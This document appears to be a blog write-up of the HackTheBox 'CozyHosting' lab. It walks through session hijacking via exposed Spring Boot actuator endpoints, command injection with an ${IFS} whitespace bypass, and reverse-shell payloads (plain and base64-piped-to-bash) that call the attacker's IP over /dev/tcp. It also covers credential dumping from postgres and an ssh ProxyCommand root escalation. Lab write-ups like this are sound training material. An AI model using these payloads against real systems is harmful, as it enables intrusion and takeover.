HackTheBox-CozyHosting(WriteUp)

Greeting Everyone! I hope you’re all doing great. Another one after so long to the writeups list. Let’s Go.

*Note: I’ll be showing the answers on top and it’s explanation just below it and as always won’t let you copy paste. See, understand, type yourself, repeat and really learn.

Q.1. User Flag

So, take a note of the technologies.

So, found three ports open.

Hmm! Okay. That’s fine for now.

So, we got a login page.

Now enumerating for any subdomain, couldn’t find anything.

Okay! That’s interesting on the ‘/error’ path.

So, giving a Google search, something interesting popped up. It means ‘Spring Boot’ framework in place.

So, fuzzing the directory further as per the article with ‘spring-boot.txt’ wordlist, we found this actuator directory. Let’s go through them one by one.

So, in sessions, located something like a username with a random string. Maybe we can try them as cookies and get access to this account. And if it doesn’t work, then we can also try to bruteforce with this ‘username’.

So, putting in the session cookie on the login page we got access as K. Anderson.

Okay! Thank you so much. LoL!

So, not much features on the page except for this one.

So, POST method being requested on ‘/executessh’. So, maybe we can get access to the target. Let’s test it then.

So, without the username but with a quote, see how it responded. Maybe we can leverage it somehow to execute our own code. Let’s research.

See what just happened. Putting the command within the backquotes is getting executed i.e. a command injection. So, what is actually happening is that the username value is separately getting executed and then it’s output is getting appended to the host IP for further actual execution. But it took me a couple of while to notice because initially thought ‘app’ keyword is part of the error. So, time to get a reverse shell using this.

But the catch is no white spaces are allowed. Let’s see what to do.

So, struggling for a while, I was unable to bypass this whitespace problem and I think we are in a rabbit hole. Let’s see some other ways.

Finally going through one of the community solutions, found that we were on the right track and the alternative for this whitespace character was ${IFS}. So, this a variable in bash that contains a whitespace, tabspace, etc.
So, we could have easily tried this by fuzzing for other alternatives. No worries, atleast we learnt something new. So, looking into this ‘/etc/passwd’, we were sure it is working perfectly. So, time to get to a reverse shell then.

So, get the below code, get the IP set and get it URL encoded and send to the target.

usertest;`bash${IFS}-c${IFS}'bash${IFS}-i${IFS}-p${IFS}>&${IFS}/dev/tcp/_Tun0IP_/6969${IFS}0>&1'`

So, it catches the redirection and maybe because of some pattern filter maybe. Let’s try to base64 encode and then try once.

So, this also fails. Now the one thing left to try is making it base64 encoded and getting it piped to base64.

So, let’s first get this converted to base64 format.

Now we just need to convert into this format i.e. need to replace ‘whoami’ with our base64 encoded reverse shell code but first getting it piped to ‘base64 -d’ for getting it decoded back to plain text format and eventually piping to bash. In a simplified manner this is what happens,

Step1) echo YmFzaCAtaSAtcCA+JiAvZGV2L3RjcC90dW4wSVAvNjk2OSAwPiYxCg==|base64 -d|bash
Step2) base64 -d YmFzaCAtaSAtcCA+JiAvZGV2L3RjcC90dW4wSVAvNjk2OSAwPiYxCg==|bash
Step3) echo 'bash -i -p >& /dev/tcp/tun0IP/6969 0>&1'|bash
Step4) bash -c 'bash -i -p >& /dev/tcp/tun0IP/6969 0>&1'

Just replace the spaces with ${IFS} in

echo YmFzaCAtaSAtcCA+JiAvZGV2L3RjcC90dW4wSVAvNjk2OSAwPiYxCg==|base64 -d|bash

and that’s it.

Now start the listener and before sending this get it URL encoded because due to the ‘+’ character within, it still says whitespaces not allowed.

And there you go, caught the shell.

So, now need to pivot to ‘josh’ for the user flag.

So, for now let’s enumerate this java archive to locate any credentials. Got this downloaded to my attacking system and eventually extracted the contents.

Located this in one of the files but there is no such ‘kanderson’ user on this system.

So, inhere found another credential. Let’s try to login to ‘postgres’ with these because found port 5432 open which is the default port for this service and hence, maybe a clear hint.

So, after getting connected, we listed the databases available and found cozyhosting(obviously).

So, got the database selected.

So, ‘users’ table is of our interest for now.

Now let’s dump the column contents of the table ‘users’.

So, let’s try cracking the admin hash which is of ‘bcrypt’ type.

And was cracked within few seconds.

Now tried this password for user ‘josh’ and there you go.

Q.2. Root Flag

Time for privilege escalation to root.

LoL! That’s way too easy. Let’s head to GTFOBins site.

The ProxyCommand is a way to tunnel the SSH connection through another command, which is useful for situations where direct connections are not possible. This is the command that will act as the proxy. It’s using a semicolon (;) to separate it from the preceding part of the command. The command itself (sh 0<&2 1>&2) is invoking a new shell.

And here is the root flag.

So, hope you enjoyed. Follow me up on the next one. Until then, Peace!